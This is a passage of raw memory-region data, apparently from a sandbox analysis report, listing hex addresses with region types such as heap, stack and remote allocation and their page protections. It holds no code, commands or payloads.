trusted library allocation
|
page read and write
|
||
7FFAAC2F0000
|
trusted library allocation
|
page execute and read and write
|
||
1BCA81F0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC134000
|
trusted library allocation
|
page read and write
|
||
7FFAAC45C000
|
trusted library allocation
|
page read and write
|
||
23D0673B000
|
heap
|
page read and write
|
||
23D06580000
|
heap
|
page read and write
|
||
7FFAAC46B000
|
trusted library allocation
|
page read and write
|
||
11E5000
|
heap
|
page read and write
|
||
292623C0000
|
trusted library allocation
|
page read and write
|
||
1F28A202000
|
heap
|
page read and write
|
||
1BC8E73E000
|
heap
|
page read and write
|
||
7FFAAC7CB000
|
trusted library allocation
|
page read and write
|
||
1BC8E570000
|
heap
|
page read and write
|
||
7FFAAC924000
|
trusted library allocation
|
page read and write
|
||
142D63F0000
|
trusted library allocation
|
page read and write
|
||
7A5C5DF000
|
stack
|
page read and write
|
||
23D07723000
|
heap
|
page read and write
|
||
23D06F78000
|
heap
|
page read and write
|
||
7177000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7BE000
|
trusted library allocation
|
page read and write
|
||
7FFAACAF5000
|
trusted library allocation
|
page read and write
|
||
29A61FD000
|
stack
|
page read and write
|
||
7FF7FE541000
|
unkown
|
page execute read
|
||
B0C69FE000
|
unkown
|
page readonly
|
||
7FFAACB27000
|
trusted library allocation
|
page read and write
|
||
660000
|
heap
|
page read and write
|
||
7FFAACA80000
|
trusted library allocation
|
page read and write
|
||
7FFAACA44000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8DD000
|
trusted library allocation
|
page read and write
|
||
1B042820000
|
heap
|
page read and write
|
||
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
23D06F00000
|
heap
|
page read and write
|
||
7FFAAC7B5000
|
trusted library allocation
|
page read and write
|
||
7FFAAC1DC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC6F4000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2E0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC130000
|
trusted library allocation
|
page read and write
|
||
7FFAAC538000
|
trusted library allocation
|
page read and write
|
||
7FFB23A90000
|
unkown
|
page readonly
|
||
23D06F5B000
|
heap
|
page read and write
|
||
7FFAAC7D4000
|
trusted library allocation
|
page read and write
|
||
7FFAAC327000
|
trusted library allocation
|
page read and write
|
||
7FFAAC90E000
|
trusted library allocation
|
page read and write
|
||
2B2A000
|
heap
|
page read and write
|
||
142DB300000
|
heap
|
page read and write
|
||
142D5B30000
|
heap
|
page read and write
|
||
23D076CD000
|
heap
|
page read and write
|
||
7FFAACB29000
|
trusted library allocation
|
page read and write
|
||
1B042677000
|
heap
|
page read and write
|
||
7FFAAC612000
|
trusted library allocation
|
page read and write
|
||
D73000
|
trusted library allocation
|
page execute and read and write
|
||
A09626E000
|
stack
|
page read and write
|
||
7FFAAC833000
|
trusted library allocation
|
page read and write
|
||
1F289E00000
|
unkown
|
page read and write
|
||
7FFAAC3BD000
|
trusted library allocation
|
page read and write
|
||
7FF7FE540000
|
unkown
|
page readonly
|
||
1B05C8B2000
|
heap
|
page read and write
|
||
20B6A7D0000
|
heap
|
page read and write
|
||
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
9C564FE000
|
stack
|
page read and write
|
||
BA8E3FF000
|
stack
|
page read and write
|
||
7FFAAC6F2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7D6000
|
trusted library allocation
|
page read and write
|
||
7FFAACB80000
|
trusted library allocation
|
page read and write
|
||
1B042810000
|
heap
|
page read and write
|
||
1A4B23C7000
|
heap
|
page read and write
|
||
16E992F0000
|
heap
|
page read and write
|
||
512F000
|
stack
|
page read and write
|
||
7FFAAC830000
|
trusted library allocation
|
page read and write
|
||
7FFAAC892000
|
trusted library allocation
|
page read and write
|
||
60EE000
|
stack
|
page read and write
|
||
9C561FE000
|
stack
|
page read and write
|
||
7FFAAC62A000
|
trusted library allocation
|
page read and write
|
||
23D06F85000
|
heap
|
page read and write
|
||
7FFAAC337000
|
trusted library allocation
|
page read and write
|
||
23D0669A000
|
heap
|
page read and write
|
||
7FFAAC34A000
|
trusted library allocation
|
page read and write
|
||
668000
|
heap
|
page read and write
|
||
7FFAAC724000
|
trusted library allocation
|
page read and write
|
||
200AB6B0000
|
heap
|
page read and write
|
||
7FFAAC810000
|
trusted library allocation
|
page read and write
|
||
7FFAAC132000
|
trusted library allocation
|
page read and write
|
||
1F28A000000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7ED000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2E0000
|
trusted library allocation
|
page execute and read and write
|
||
23D06F5B000
|
heap
|
page read and write
|
||
142DB169000
|
direct allocation
|
page execute and read and write
|
||
2926410C000
|
trusted library allocation
|
page read and write
|
||
1A4B0B30000
|
trusted library allocation
|
page read and write
|
||
20B6A740000
|
heap
|
page read and write
|
||
7FFAACAFC000
|
trusted library allocation
|
page read and write
|
||
7FFAAC360000
|
trusted library allocation
|
page read and write
|
||
7FFAAC588000
|
trusted library allocation
|
page read and write
|
||
23D06F37000
|
heap
|
page read and write
|
||
1B056039000
|
trusted library allocation
|
page read and write
|
||
1F289E3C000
|
heap
|
page read and write
|
||
7FFAAC378000
|
trusted library allocation
|
page read and write
|
||
7FFAACB0B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8CD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4A7000
|
trusted library allocation
|
page read and write
|
||
7FFAAC572000
|
trusted library allocation
|
page read and write
|
||
292620C0000
|
unkown
|
page readonly
|
||
1F289E74000
|
heap
|
page read and write
|
||
23D07734000
|
heap
|
page read and write
|
||
7FFAACA17000
|
trusted library allocation
|
page read and write
|
||
23D06F80000
|
heap
|
page read and write
|
||
16EB4D60000
|
heap
|
page read and write
|
||
17D46C80000
|
heap
|
page read and write
|
||
17D46D90000
|
remote allocation
|
page execute and read and write
|
||
7FFAAC654000
|
trusted library allocation
|
page read and write
|
||
7FFAAC76C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC785000
|
trusted library allocation
|
page read and write
|
||
7FFAAC912000
|
trusted library allocation
|
page read and write
|
||
7FFAAC18C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC900000
|
trusted library allocation
|
page read and write
|
||
23D076A8000
|
heap
|
page read and write
|
||
29273DF1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC123000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC89C000
|
trusted library allocation
|
page read and write
|
||
1F289D20000
|
heap
|
page read and write
|
||
4F8000
|
stack
|
page read and write
|
||
7FFAAC15D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC3B0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC493000
|
trusted library allocation
|
page read and write
|
||
7301000
|
trusted library allocation
|
page read and write
|
||
1BC90060000
|
heap
|
page read and write
|
||
7FFAAC300000
|
trusted library allocation
|
page read and write
|
||
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
C5ABFE000
|
stack
|
page read and write
|
||
9C55FFE000
|
stack
|
page read and write
|
||
7FFAAC371000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2E8000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC909000
|
trusted library allocation
|
page read and write
|
||
7FFAAC140000
|
trusted library allocation
|
page read and write
|
||
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
1402C5000
|
remote allocation
|
page execute and read and write
|
||
23D06F52000
|
heap
|
page read and write
|
||
7FFAAC932000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8E0000
|
trusted library allocation
|
page read and write
|
||
2109C3C0000
|
direct allocation
|
page execute and read and write
|
||
7FFAAC628000
|
trusted library allocation
|
page read and write
|
||
7FFAAC88D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC390000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC8DB000
|
trusted library allocation
|
page read and write
|
||
E48000
|
heap
|
page read and write
|
||
E0E000
|
stack
|
page read and write
|
||
14000B000
|
remote allocation
|
page execute and read and write
|
||
9BB000
|
trusted library allocation
|
page read and write
|
||
2109A3D9000
|
heap
|
page read and write
|
||
7FFAAC88B000
|
trusted library allocation
|
page read and write
|
||
24D0000
|
trusted library allocation
|
page read and write
|
||
1BC901B0000
|
heap
|
page read and write
|
||
142D5CFE000
|
heap
|
page read and write
|
||
7FFAAC8C9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7FC000
|
trusted library allocation
|
page read and write
|
||
1BCAB4A0000
|
heap
|
page read and write
|
||
23D07677000
|
heap
|
page read and write
|
||
7FFAAC558000
|
trusted library allocation
|
page read and write
|
||
A09627E000
|
stack
|
page read and write
|
||
23D0673B000
|
heap
|
page read and write
|
||
7FFAAC879000
|
trusted library allocation
|
page read and write
|
||
42D67FC000
|
stack
|
page read and write
|
||
23D06F2B000
|
heap
|
page read and write
|
||
98C03FE000
|
stack
|
page read and write
|
||
1A4CEFE0000
|
heap
|
page read and write
|
||
7FFAAC889000
|
trusted library allocation
|
page read and write
|
||
7FFAAC92B000
|
trusted library allocation
|
page read and write
|
||
29263C30000
|
trusted library section
|
page readonly
|
||
7FFAAC91D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3CD000
|
trusted library allocation
|
page read and write
|
||
292623E0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC88D000
|
trusted library allocation
|
page read and write
|
||
7FFAACA32000
|
trusted library allocation
|
page read and write
|
||
7FFAACAFC000
|
trusted library allocation
|
page read and write
|
||
16EAACFE000
|
trusted library allocation
|
page read and write
|
||
1A4CFA20000
|
trusted library section
|
page read and write
|
||
23D06F7A000
|
heap
|
page read and write
|
||
7FFAAC729000
|
trusted library allocation
|
page read and write
|
||
16E9ADD2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC491000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7E3000
|
trusted library allocation
|
page read and write
|
||
56DC000
|
stack
|
page read and write
|
||
23D06F52000
|
heap
|
page read and write
|
||
7FFAAC7D4000
|
trusted library allocation
|
page read and write
|
||
7FFAAC470000
|
trusted library allocation
|
page read and write
|
||
142DB1E0000
|
trusted library allocation
|
page read and write
|
||
23D06670000
|
heap
|
page read and write
|
||
7FFAAC4F6000
|
trusted library allocation
|
page read and write
|
||
7FFAAC55B000
|
trusted library allocation
|
page read and write
|
||
23D076A8000
|
heap
|
page read and write
|
||
1BC8E670000
|
heap
|
page read and write
|
||
7FFAAC830000
|
trusted library allocation
|
page read and write
|
||
7FFAAC572000
|
trusted library allocation
|
page read and write
|
||
7FFAAC75A000
|
trusted library allocation
|
page read and write
|
||
2109A3BC000
|
heap
|
page read and write
|
||
7FFAACB64000
|
trusted library allocation
|
page read and write
|
||
7FFAAC754000
|
trusted library allocation
|
page read and write
|
||
7FFAAC466000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7D2000
|
trusted library allocation
|
page read and write
|
||
29273DC3000
|
trusted library allocation
|
page read and write
|
||
23D0673B000
|
heap
|
page read and write
|
||
7FFAAC94D000
|
trusted library allocation
|
page read and write
|
||
1A4B095C000
|
heap
|
page read and write
|
||
7FFAACA17000
|
trusted library allocation
|
page read and write
|
||
142DB22E000
|
heap
|
page read and write
|
||
7FFAAC3D2000
|
trusted library allocation
|
page read and write
|
||
B0C75FE000
|
unkown
|
page readonly
|
||
1B05DC50000
|
heap
|
page read and write
|
||
BA8DFFB000
|
unkown
|
page read and write
|
||
7FFAAC844000
|
trusted library allocation
|
page read and write
|
||
42D6BFF000
|
stack
|
page read and write
|
||
142DB2D6000
|
heap
|
page read and write
|
||
1B0425E0000
|
heap
|
page read and write
|
||
7FFAAC872000
|
trusted library allocation
|
page read and write
|
||
1BC8E710000
|
heap
|
page read and write
|
||
7FFAAC7CF000
|
trusted library allocation
|
page read and write
|
||
23D07600000
|
heap
|
page read and write
|
||
3587000
|
trusted library allocation
|
page read and write
|
||
42D6EFD000
|
stack
|
page read and write
|
||
7FFAAC7D6000
|
trusted library allocation
|
page read and write
|
||
142DB4B0000
|
remote allocation
|
page read and write
|
||
7FFB23AB0000
|
unkown
|
page read and write
|
||
2927F3E1000
|
heap
|
page read and write
|
||
7FFAAC73B000
|
trusted library allocation
|
page read and write
|
||
1BCAE760000
|
heap
|
page read and write
|
||
7FFAAC6AB000
|
trusted library allocation
|
page read and write
|
||
23D06F96000
|
heap
|
page read and write
|
||
23D07712000
|
heap
|
page read and write
|
||
1A4B2CF3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC310000
|
trusted library allocation
|
page read and write
|
||
23D06713000
|
heap
|
page read and write
|
||
1483000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
A36AAFE000
|
stack
|
page read and write
|
||
7FFAAC3B3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC70C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC144000
|
trusted library allocation
|
page read and write
|
||
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
23D06F13000
|
heap
|
page read and write
|
||
7FFB1D562000
|
unkown
|
page readonly
|
||
23D06F7E000
|
heap
|
page read and write
|
||
23D06E02000
|
heap
|
page read and write
|
||
16E9918B000
|
heap
|
page read and write
|
||
7FFAACB70000
|
trusted library allocation
|
page read and write
|
||
2511000
|
trusted library allocation
|
page read and write
|
||
7FFAAC328000
|
trusted library allocation
|
page read and write
|
||
23D076A8000
|
heap
|
page read and write
|
||
7FFAAC836000
|
trusted library allocation
|
page read and write
|
||
26E36D30000
|
heap
|
page read and write
|
||
7FFAACA5F000
|
trusted library allocation
|
page read and write
|
||
7FFAAC480000
|
trusted library allocation
|
page read and write
|
||
29264368000
|
trusted library allocation
|
page read and write
|
||
7FFAAC854000
|
trusted library allocation
|
page read and write
|
||
7FFAAC732000
|
trusted library allocation
|
page read and write
|
||
9C567FD000
|
stack
|
page read and write
|
||
23D0770A000
|
heap
|
page read and write
|
||
B0C6AFE000
|
stack
|
page read and write
|
||
7FFAACB32000
|
trusted library allocation
|
page read and write
|
||
1B05C8B6000
|
heap
|
page read and write
|
||
7FFAAC313000
|
trusted library allocation
|
page read and write
|
||
7FFAAC860000
|
trusted library allocation
|
page read and write
|
||
142D5C13000
|
heap
|
page read and write
|
||
23D0673B000
|
heap
|
page read and write
|
||
2927C770000
|
heap
|
page read and write
|
||
2109A404000
|
heap
|
page read and write
|
||
7FFAAC8DD000
|
trusted library allocation
|
page read and write
|
||
1306000
|
heap
|
page read and write
|
||
7FFAAC426000
|
trusted library allocation
|
page read and write
|
||
5AEE000
|
stack
|
page read and write
|
||
7FFAAC1E0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC934000
|
trusted library allocation
|
page read and write
|
||
BD0000
|
trusted library allocation
|
page read and write
|
||
23D07733000
|
heap
|
page read and write
|
||
15A0000
|
trusted library allocation
|
page read and write
|
||
85E000
|
stack
|
page read and write
|
||
1460000
|
trusted library allocation
|
page read and write
|
||
15B0000
|
trusted library allocation
|
page read and write
|
||
23D06F7C000
|
heap
|
page read and write
|
||
DFE000
|
stack
|
page read and write
|
||
7FFAAC400000
|
trusted library allocation
|
page read and write
|
||
29273DB1000
|
trusted library allocation
|
page read and write
|
||
1B0440F0000
|
trusted library section
|
page readonly
|
||
7FFAAC3D2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7D8000
|
trusted library allocation
|
page read and write
|
||
E30000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4A9000
|
trusted library allocation
|
page read and write
|
||
23D06F31000
|
heap
|
page read and write
|
||
29262440000
|
heap
|
page read and write
|
||
23D06F52000
|
heap
|
page read and write
|
||
D60000
|
trusted library allocation
|
page read and write
|
||
7FFAAC860000
|
trusted library allocation
|
page read and write
|
||
24F0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC787000
|
trusted library allocation
|
page read and write
|
||
5C91000
|
heap
|
page read and write
|
||
27FE000
|
stack
|
page read and write
|
||
16E99270000
|
trusted library allocation
|
page read and write
|
||
7FFAAC1E0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
16E991D5000
|
heap
|
page read and write
|
||
7FFAAC7EF000
|
trusted library allocation
|
page read and write
|
||
6750000
|
heap
|
page read and write
|
||
384C3FE000
|
unkown
|
page readonly
|
||
7FFAAC250000
|
trusted library allocation
|
page execute and read and write
|
||
23CE000
|
stack
|
page read and write
|
||
7FFAACB34000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8CB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC74A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5DC000
|
trusted library allocation
|
page read and write
|
||
1BC8E870000
|
heap
|
page read and write
|
||
7FFAAC57E000
|
trusted library allocation
|
page read and write
|
||
32F9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3ED000
|
trusted library allocation
|
page read and write
|
||
7FFAAC466000
|
trusted library allocation
|
page read and write
|
||
7FFAAC905000
|
trusted library allocation
|
page read and write
|
||
810000
|
heap
|
page read and write
|
||
7FFAAC902000
|
trusted library allocation
|
page read and write
|
||
23D0769D000
|
heap
|
page read and write
|
||
7FFAAC3CF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3E0000
|
trusted library allocation
|
page read and write
|
||
B4F000
|
stack
|
page read and write
|
||
7FFAAC2CF000
|
trusted library allocation
|
page read and write
|
||
7FFAACA64000
|
trusted library allocation
|
page read and write
|
||
142D6415000
|
heap
|
page read and write
|
||
1A4CBE80000
|
heap
|
page read and write
|
||
7FFAAC462000
|
trusted library allocation
|
page read and write
|
||
7FFAAC88B000
|
trusted library allocation
|
page read and write
|
||
16E9918E000
|
heap
|
page read and write
|
||
23D0674C000
|
heap
|
page read and write
|
||
7FFAAC884000
|
trusted library allocation
|
page read and write
|
||
7FFAACA2F000
|
trusted library allocation
|
page read and write
|
||
1474000
|
trusted library allocation
|
page read and write
|
||
7FFAAC120000
|
trusted library allocation
|
page read and write
|
||
1DE000
|
stack
|
page read and write
|
||
7FFAAC7D2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC85A000
|
trusted library allocation
|
page read and write
|
||
147D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC974000
|
trusted library allocation
|
page read and write
|
||
29200010000
|
trusted library section
|
page read and write
|
||
7FFAAC734000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7BC000
|
trusted library allocation
|
page read and write
|
||
7FFAAC56D000
|
trusted library allocation
|
page read and write
|
||
2927C780000
|
heap
|
page read and write
|
||
7FFAAC1E0000
|
trusted library allocation
|
page execute and read and write
|
||
1BCA9D50000
|
heap
|
page read and write
|
||
7FFAAC46E000
|
trusted library allocation
|
page read and write
|
||
29263CA0000
|
heap
|
page read and write
|
||
7FFAACB1C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC84A000
|
trusted library allocation
|
page read and write
|
||
3511000
|
trusted library allocation
|
page read and write
|
||
7FFAAC85F000
|
trusted library allocation
|
page read and write
|
||
142DB2F6000
|
heap
|
page read and write
|
||
42D62F3000
|
stack
|
page read and write
|
||
1F28A069000
|
direct allocation
|
page execute and read and write
|
||
717A000
|
trusted library allocation
|
page read and write
|
||
6B2C000
|
stack
|
page read and write
|
||
7FFAAC390000
|
trusted library allocation
|
page read and write
|
||
1BC90532000
|
trusted library allocation
|
page read and write
|
||
1F289E74000
|
unkown
|
page read and write
|
||
7FFAAC371000
|
trusted library allocation
|
page read and write
|
||
7FFAAC673000
|
trusted library allocation
|
page read and write
|
||
2500000
|
heap
|
page read and write
|
||
7FFAAC1EC000
|
trusted library allocation
|
page execute and read and write
|
||
26E369A0000
|
heap
|
page read and write
|
||
23D06F5B000
|
heap
|
page read and write
|
||
7FFAAC34F000
|
trusted library allocation
|
page read and write
|
||
1A4B09C6000
|
heap
|
page read and write
|
||
7FFAACAD0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3BD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC390000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC370000
|
trusted library allocation
|
page read and write
|
||
2109A406000
|
heap
|
page read and write
|
||
23D0673B000
|
heap
|
page read and write
|
||
7FFAAC8F0000
|
trusted library allocation
|
page read and write
|
||
23D06F57000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
7FFAAC337000
|
trusted library allocation
|
page read and write
|
||
7FFAAC48E000
|
trusted library allocation
|
page read and write
|
||
23D06F59000
|
heap
|
page read and write
|
||
7FFAAC924000
|
trusted library allocation
|
page read and write
|
||
7FFAAC954000
|
trusted library allocation
|
page read and write
|
||
301E000
|
stack
|
page read and write
|
||
7FFAAC657000
|
trusted library allocation
|
page read and write
|
||
2906000
|
trusted library allocation
|
page read and write
|
||
7CE000
|
stack
|
page read and write
|
||
15BB000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC940000
|
trusted library allocation
|
page read and write
|
||
7FFAAC17C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC3D0000
|
trusted library allocation
|
page read and write
|
||
23D06DF0000
|
remote allocation
|
page read and write
|
||
23D06F78000
|
heap
|
page read and write
|
||
7FFAAC13D000
|
trusted library allocation
|
page execute and read and write
|
||
23D06F5B000
|
heap
|
page read and write
|
||
16EB34F0000
|
heap
|
page read and write
|
||
A1D000
|
stack
|
page read and write
|
||
23D0769D000
|
heap
|
page read and write
|
||
7FFAAC8FE000
|
trusted library allocation
|
page read and write
|
||
5C4B000
|
heap
|
page read and write
|
||
29A5BFC000
|
stack
|
page read and write
|
||
7FFAACA20000
|
trusted library allocation
|
page read and write
|
||
7FFAAC590000
|
trusted library allocation
|
page execute and read and write
|
||
1BCA01ED000
|
trusted library allocation
|
page read and write
|
||
23D0671A000
|
heap
|
page read and write
|
||
23D06F7B000
|
heap
|
page read and write
|
||
23D06F52000
|
heap
|
page read and write
|
||
7FFAACA85000
|
trusted library allocation
|
page read and write
|
||
7FFAAC800000
|
trusted library allocation
|
page read and write
|
||
1237000
|
heap
|
page read and write
|
||
7FFAAC8A1000
|
trusted library allocation
|
page read and write
|
||
D9A000
|
trusted library allocation
|
page execute and read and write
|
||
768000
|
stack
|
page read and write
|
||
1A4B0C15000
|
heap
|
page read and write
|
||
23D06F84000
|
heap
|
page read and write
|
||
7FFAAC91A000
|
trusted library allocation
|
page read and write
|
||
23D0674C000
|
heap
|
page read and write
|
||
7FFAAC143000
|
trusted library allocation
|
page read and write
|
||
23D06F5B000
|
heap
|
page read and write
|
||
65BD000
|
stack
|
page read and write
|
||
7FFAAC9E8000
|
trusted library allocation
|
page read and write
|
||
1497000
|
heap
|
page read and write
|
||
7FFAAC581000
|
trusted library allocation
|
page read and write
|
||
D40000
|
heap
|
page read and write
|
||
1BC8E4E0000
|
unkown
|
page readonly
|
||
142DB680000
|
trusted library allocation
|
page read and write
|
||
1B04437E000
|
trusted library allocation
|
page read and write
|
||
7FFAAC974000
|
trusted library allocation
|
page read and write
|
||
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7DD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC55B000
|
trusted library allocation
|
page read and write
|
||
16E991A0000
|
heap
|
page read and write
|
||
7FFAAC82E000
|
trusted library allocation
|
page read and write
|
||
2109A426000
|
heap
|
page read and write
|
||
7FFAAC7BC000
|
trusted library allocation
|
page read and write
|
||
2926430A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4E2000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
292620C2000
|
unkown
|
page readonly
|
||
1B042793000
|
trusted library allocation
|
page read and write
|
||
7FFAAC216000
|
trusted library allocation
|
page execute and read and write
|
||
23D076A3000
|
heap
|
page read and write
|
||
1A4CAD90000
|
heap
|
page read and write
|
||
23D0674C000
|
heap
|
page read and write
|
||
142DB0F0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
16E99330000
|
heap
|
page read and write
|
||
7FFAAC90B000
|
trusted library allocation
|
page read and write
|
||
46EE000
|
stack
|
page read and write
|
||
7FFAAC657000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7B5000
|
trusted library allocation
|
page read and write
|
||
23D07677000
|
heap
|
page read and write
|
||
5E0C1FF000
|
stack
|
page read and write
|
||
23D06F74000
|
heap
|
page read and write
|
||
7FFAAC3AA000
|
trusted library allocation
|
page read and write
|
||
2900000
|
trusted library allocation
|
page read and write
|
||
1A4CC4C6000
|
heap
|
page read and write
|
||
16EAAC97000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5DC000
|
trusted library allocation
|
page read and write
|
||
142D6C20000
|
trusted library allocation
|
page read and write
|
||
7FFAAC918000
|
trusted library allocation
|
page read and write
|
||
23D06F52000
|
heap
|
page read and write
|
||
23D0671A000
|
heap
|
page read and write
|
||
7FFAACA17000
|
trusted library allocation
|
page read and write
|
||
23D06D70000
|
remote allocation
|
page read and write
|
||
23D06F54000
|
heap
|
page read and write
|
||
7FFAAC388000
|
trusted library allocation
|
page read and write
|
||
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
142D5CA7000
|
heap
|
page read and write
|
||
29273DD1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC89F000
|
trusted library allocation
|
page read and write
|
||
16EB4DE1000
|
heap
|
page read and write
|
||
7FFAAC327000
|
trusted library allocation
|
page read and write
|
||
7FFAAC590000
|
trusted library allocation
|
page execute and read and write
|
||
23D06F54000
|
heap
|
page read and write
|
||
7FFAAC826000
|
trusted library allocation
|
page read and write
|
||
7FFAAC63E000
|
trusted library allocation
|
page read and write
|
||
7FFAAC124000
|
trusted library allocation
|
page read and write
|
||
7FFAAC954000
|
trusted library allocation
|
page read and write
|
||
2910000
|
heap
|
page read and write
|
||
126B000
|
heap
|
page read and write
|
||
1A4B2680000
|
heap
|
page read and write
|
||
7FFAAC531000
|
trusted library allocation
|
page read and write
|
||
7FFAACAD2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC85F000
|
trusted library allocation
|
page read and write
|
||
7FFAAC64A000
|
trusted library allocation
|
page read and write
|
||
7FFAACB2D000
|
trusted library allocation
|
page read and write
|
||
161E000
|
stack
|
page read and write
|
||
7FFAAC2E2000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC579000
|
trusted library allocation
|
page read and write
|
||
7FFAAC824000
|
trusted library allocation
|
page read and write
|
||
7FFAAC852000
|
trusted library allocation
|
page read and write
|
||
7FFAACB50000
|
trusted library allocation
|
page read and write
|
||
7FFAECEB0000
|
direct allocation
|
page execute read
|
||
7FFAAC7E5000
|
trusted library allocation
|
page read and write
|
||
7FFAACB8C000
|
trusted library allocation
|
page read and write
|
||
16EB3755000
|
heap
|
page read and write
|
||
384C0FE000
|
unkown
|
page readonly
|
||
2109A340000
|
heap
|
page read and write
|
||
7FFAAC85C000
|
trusted library allocation
|
page read and write
|
||
7E0000
|
trusted library allocation
|
page read and write
|
||
29262415000
|
heap
|
page read and write
|
||
7FFAAC7C6000
|
trusted library allocation
|
page read and write
|
||
2109A3D4000
|
heap
|
page read and write
|
||
7FFAAC576000
|
trusted library allocation
|
page read and write
|
||
7FFAAC51C000
|
trusted library allocation
|
page read and write
|
||
29262410000
|
heap
|
page read and write
|
||
1BC8E71C000
|
heap
|
page read and write
|
||
7FFAAC844000
|
trusted library allocation
|
page read and write
|
||
7FFAACB48000
|
trusted library allocation
|
page read and write
|
||
7FFAACA5D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC51E000
|
trusted library allocation
|
page read and write
|
||
23D07696000
|
heap
|
page read and write
|
||
7FFAAC3ED000
|
trusted library allocation
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
7FFAAC53C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC57E000
|
trusted library allocation
|
page read and write
|
||
1A4B0B93000
|
heap
|
page read and write
|
||
7FFAAC628000
|
trusted library allocation
|
page read and write
|
||
BA8E7FE000
|
stack
|
page read and write
|
||
1DDEEF70000
|
remote allocation
|
page execute and read and write
|
||
2C80000
|
heap
|
page read and write
|
||
1A4B08E0000
|
heap
|
page read and write
|
||
142D6402000
|
heap
|
page read and write
|
||
7FFAAC87E000
|
trusted library allocation
|
page read and write
|
||
23D07679000
|
heap
|
page read and write
|
||
2109A3D4000
|
heap
|
page read and write
|
||
7FFAACA64000
|
trusted library allocation
|
page read and write
|
||
7FFAAC62A000
|
trusted library allocation
|
page read and write
|
||
2EE0000
|
trusted library allocation
|
page read and write
|
||
16E99100000
|
heap
|
page read and write
|
||
7FFAAC826000
|
trusted library allocation
|
page read and write
|
||
7FFAAC934000
|
trusted library allocation
|
page read and write
|
||
2E5E000
|
stack
|
page read and write
|
||
200AB610000
|
heap
|
page read and write
|
||
7FFAAC132000
|
trusted library allocation
|
page read and write
|
||
7FFAAC934000
|
trusted library allocation
|
page read and write
|
||
16E990E0000
|
heap
|
page read and write
|
||
16EB34F3000
|
heap
|
page read and write
|
||
7FFAAC912000
|
trusted library allocation
|
page read and write
|
||
23D06F56000
|
heap
|
page read and write
|
||
2109A575000
|
heap
|
page read and write
|
||
5E6D000
|
stack
|
page read and write
|
||
7FFAACB09000
|
trusted library allocation
|
page read and write
|
||
7FFAAC533000
|
trusted library allocation
|
page read and write
|
||
7FFAAC497000
|
trusted library allocation
|
page read and write
|
||
6EDF0000
|
unkown
|
page readonly
|
||
1B05C8A1000
|
heap
|
page read and write
|
||
7FFAAC1D0000
|
trusted library allocation
|
page read and write
|
||
1A4CC4B9000
|
heap
|
page read and write
|
||
7FFAAC710000
|
trusted library allocation
